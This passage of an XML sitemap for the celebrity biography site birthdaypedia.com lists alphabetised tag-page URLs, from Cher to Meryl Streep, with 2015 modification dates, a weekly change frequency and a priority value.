<lastmod>2015-08-11T21:52:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/cher/</loc>\n <lastmod>2015-07-29T12:39:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/cher-bio/</loc>\n <lastmod>2015-07-29T12:39:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/chers-life/</loc>\n <lastmod>2015-07-29T12:39:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/chris-brown/</loc>\n <lastmod>2015-07-29T12:07:02+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/colombian-celebrities/</loc>\n <lastmod>2015-07-23T23:35:41+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/comedian-actor/</loc>\n <lastmod>2015-08-19T20:47:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/comedian-movies/</loc>\n <lastmod>2015-08-19T20:47:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/comedy-series/</loc>\n <lastmod>2015-08-20T12:17:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/cosplay/</loc>\n <lastmod>2015-08-11T20:57:16+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/cougar-town/</loc>\n <lastmod>2015-07-29T12:46:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/country-legend-tim-mcgraw/</loc>\n <lastmod>2015-07-29T12:10:24+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/country-music/</loc>\n <lastmod>2015-07-29T12:10:24+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/country-music-artist/</loc>\n <lastmod>2015-07-23T23:55:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/country-music-singer/</loc>\n <lastmod>2015-07-29T12:21:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/courteney-cox/</loc>\n <lastmod>2015-07-29T12:46:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/dallas-mavericks-basketball-team/</loc>\n <lastmod>2015-07-24T00:02:07+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/debbie-gibson/</loc>\n <lastmod>2015-08-20T20:35:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/dianna-argon/</loc>\n <lastmod>2015-07-29T12:26:39+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/disney-celebrities/</loc>\n <lastmod>2015-07-29T12:18:27+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/disney-star/</loc>\n <lastmod>2015-07-23T22:51:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/disney-star-with-criminal-record/</loc>\n <lastmod>2015-07-23T22:51:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/dogtown-skateboards/</loc>\n <lastmod>2015-07-29T12:19:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/dr-house/</loc>\n <lastmod>2015-07-29T12:41:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/drake-josh/</loc>\n <lastmod>2015-07-29T12:20:51+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/duckman/</loc>\n <lastmod>2015-07-29T12:50:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/duckmen-dvd-series/</loc>\n <lastmod>2015-07-29T12:50:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/dwayne-the-rock-johnson/</loc>\n <lastmod>2015-07-29T12:10:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/dwayne-johnson/</loc>\n <lastmod>2015-07-29T12:10:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/edward-norton/</loc>\n <lastmod>2015-08-20T18:47:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/english-comedian/</loc>\n <lastmod>2015-07-29T12:12:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/enrique-iglesias/</loc>\n <lastmod>2015-07-29T11:49:02+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-actor-and-musician/</loc>\n <lastmod>2015-07-23T23:44:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-actress/</loc>\n <lastmod>2015-07-23T22:36:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-american-wrestler/</loc>\n <lastmod>2015-07-23T23:52:35+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-bodybuilder/</loc>\n <lastmod>2015-07-24T00:01:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-boxer/</loc>\n <lastmod>2015-07-29T12:17:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-chefs/</loc>\n <lastmod>2015-07-29T12:49:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-country-musician/</loc>\n <lastmod>2015-07-29T12:21:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-guitarist/</loc>\n <lastmod>2015-07-23T23:45:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-journalist/</loc>\n <lastmod>2015-07-29T13:15:51+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-latin-american-in-us/</loc>\n <lastmod>2015-07-29T11:43:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-militars/</loc>\n <lastmod>2015-07-29T13:17:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-model/</loc>\n <lastmod>2015-07-29T13:20:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-movie-actor/</loc>\n <lastmod>2015-07-23T23:33:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-pop-singer/</loc>\n <lastmod>2015-07-29T12:31:37+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-radio-host/</loc>\n <lastmod>2015-07-29T12:24:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-tv-actress/</loc>\n <lastmod>2015-07-23T22:36:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/famous-wrestler/</loc>\n <lastmod>2015-07-29T12:30:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/fc-barcelona/</loc>\n <lastmod>2015-07-29T12:34:58+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/female-professional-wrestler/</loc>\n <lastmod>2015-07-29T12:42:08+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/female-star/</loc>\n <lastmod>2015-08-11T21:52:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/ferddy-kreuger-actor/</loc>\n <lastmod>2015-07-29T13:18:36+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/film-producer/</loc>\n <lastmod>2015-08-20T19:58:22+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/films-directed-by-robert-englund/</loc>\n <lastmod>2015-07-29T13:18:36+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/foregin-celebrities/</loc>\n <lastmod>2015-07-23T23:35:41+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/foreign-celebrity/</loc>\n <lastmod>2015-07-24T00:01:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/foreign-designer/</loc>\n <lastmod>2015-07-23T23:38:09+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/foreign-movie-actor/</loc>\n <lastmod>2015-07-23T23:49:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/foreign-musician/</loc>\n <lastmod>2015-07-23T23:45:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/forrest-gump-leading-actor/</loc>\n <lastmod>2015-07-23T23:33:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/freddy-kreuger/</loc>\n <lastmod>2015-07-29T13:18:36+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/friends-actors/</loc>\n <lastmod>2015-07-29T12:46:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/gary-busey/</loc>\n <lastmod>2015-07-29T12:15:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/gay-icon/</loc>\n <lastmod>2015-07-29T12:39:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/george-clooney/</loc>\n <lastmod>2015-07-29T12:06:03+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/george-clooney-humanitarian-work/</loc>\n <lastmod>2015-07-29T12:06:03+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/george-strait/</loc>\n <lastmod>2015-07-29T12:21:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/gerald-mcraney/</loc>\n <lastmod>2015-08-20T19:02:27+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/glee-cast/</loc>\n <lastmod>2015-07-29T12:26:39+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/golden-globe-award/</loc>\n <lastmod>2015-07-29T13:17:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/golden-globe-award-winners/</loc>\n <lastmod>2015-07-29T13:17:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/grammy-award/</loc>\n <lastmod>2015-07-29T12:36:05+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/great-musicians/</loc>\n <lastmod>2015-07-29T12:57:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/greatest-actors/</loc>\n <lastmod>2015-07-29T12:41:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/greatest-bands-ever/</loc>\n <lastmod>2015-07-29T12:32:30+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/greatest-musicians-ever/</loc>\n <lastmod>2015-07-29T12:32:30+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/greatest-stand-up-comedian/</loc>\n <lastmod>2015-07-29T12:25:55+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/harry-potter/</loc>\n <lastmod>2015-08-20T19:39:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/harry-potter-cast/</loc>\n <lastmod>2015-07-23T23:49:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/hayden-panettiere/</loc>\n <lastmod>2015-08-20T19:18:22+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/high-grossing-television-shows/</loc>\n <lastmod>2015-07-23T23:41:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/hip-hop-musician/</loc>\n <lastmod>2015-07-29T12:36:05+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/hot-amercian-actress/</loc>\n <lastmod>2015-07-23T23:35:41+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/hot-movie-actor/</loc>\n <lastmod>2015-07-23T23:36:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/hugh-laurie/</loc>\n <lastmod>2015-07-29T12:41:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/ian-mckellen/</loc>\n <lastmod>2015-07-29T12:48:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/ian-mckellens-life/</loc>\n <lastmod>2015-07-29T12:48:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/icarly/</loc>\n <lastmod>2015-07-29T12:20:51+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/identity-thief/</loc>\n <lastmod>2015-08-20T12:17:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/important-businessman/</loc>\n <lastmod>2015-07-24T00:02:07+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/important-people-from-film-industry/</loc>\n <lastmod>2015-07-23T23:41:40+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/important-politician/</loc>\n <lastmod>2015-08-11T20:49:19+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/important-radio-host/</loc>\n <lastmod>2015-07-29T12:24:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/important-tv-host/</loc>\n <lastmod>2015-07-29T12:25:01+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/indian-outlaw/</loc>\n <lastmod>2015-07-29T12:10:24+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/international-clothing-line/</loc>\n <lastmod>2015-07-23T23:38:09+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/international-medical-corps/</loc>\n <lastmod>2015-07-29T12:19:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/iron-lady/</loc>\n <lastmod>2015-07-29T12:33:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/italian-important-people/</loc>\n <lastmod>2015-07-23T23:38:09+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jack-black/</loc>\n <lastmod>2015-08-19T20:47:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jack-nicholson/</loc>\n <lastmod>2015-07-29T12:27:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jack-nicholson-bio/</loc>\n <lastmod>2015-07-29T12:27:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jack-nicholson-oscar-win/</loc>\n <lastmod>2015-07-29T12:27:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/james-hugh-calum-laurie/</loc>\n <lastmod>2015-07-29T12:41:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jamie-oliver/</loc>\n <lastmod>2015-07-29T12:49:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jay-leno/</loc>\n <lastmod>2015-07-29T12:25:01+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jep-robertson/</loc>\n <lastmod>2015-07-29T12:50:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jerry-seinfeld/</loc>\n <lastmod>2015-07-29T12:25:55+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jhonny-unitas/</loc>\n <lastmod>2015-07-29T11:59:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jim-nabors/</loc>\n <lastmod>2015-07-29T12:45:24+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/jim-nabors-television-man/</loc>\n <lastmod>2015-07-29T12:45:24+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/john-cena/</loc>\n <lastmod>2015-07-29T12:30:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/john-constantine-unitas/</loc>\n <lastmod>2015-07-29T11:59:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/john-unitas/</loc>\n <lastmod>2015-07-29T11:59:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/johnny-depp/</loc>\n <lastmod>2015-07-29T12:38:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/johnny-depps-first-job/</loc>\n <lastmod>2015-07-29T12:38:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/justin-beiber-girlfriend/</loc>\n <lastmod>2015-07-23T23:46:04+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/kansas-celebrity/</loc>\n <lastmod>2015-07-23T23:55:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/kanye-west/</loc>\n <lastmod>2015-07-29T12:36:05+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/kate-upton/</loc>\n <lastmod>2015-07-29T13:20:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/katie-holmes-ex/</loc>\n <lastmod>2015-07-23T23:36:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/kelly-clarkson/</loc>\n <lastmod>2015-07-29T12:31:37+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/king-of-country/</loc>\n <lastmod>2015-07-29T12:21:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/krla/</loc>\n <lastmod>2015-07-29T12:24:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/kung-fu-panda/</loc>\n <lastmod>2015-08-19T20:47:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/la-toya-jackson/</loc>\n <lastmod>2015-07-29T12:56:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/latin-american-celebrity/</loc>\n <lastmod>2015-07-23T23:35:41+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/latin-culture-artist/</loc>\n <lastmod>2015-07-23T23:52:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/latin-infused-jazz-music/</loc>\n <lastmod>2015-07-23T23:45:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/latin-infused-rock-music/</loc>\n <lastmod>2015-07-23T23:45:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/laurence-tureaud/</loc>\n <lastmod>2015-07-29T12:40:14+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/leading-with-my-chin/</loc>\n <lastmod>2015-07-29T12:25:01+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/lenny-kravitz/</loc>\n <lastmod>2015-07-29T12:57:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/lethal-weapon/</loc>\n <lastmod>2015-07-29T12:15:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/linda-mccartney/</loc>\n <lastmod>2015-07-29T12:32:30+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/lionel-messi/</loc>\n <lastmod>2015-07-29T12:34:58+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/liverpool-celebrity/</loc>\n <lastmod>2015-07-23T23:11:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/lost-cast/</loc>\n <lastmod>2015-08-11T20:47:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mamma-mia/</loc>\n <lastmod>2015-07-29T12:33:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mandy-song/</loc>\n <lastmod>2015-07-29T12:47:48+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/maryland-celebrity/</loc>\n <lastmod>2015-07-23T23:44:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mcgraw/</loc>\n <lastmod>2015-07-29T12:10:24+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mean-girls-celebrities/</loc>\n <lastmod>2015-07-23T22:51:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/melissa-mccarthy/</loc>\n <lastmod>2015-08-20T12:17:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mery-streep-bio/</loc>\n <lastmod>2015-07-29T12:33:26+00:00</lastmod>\n 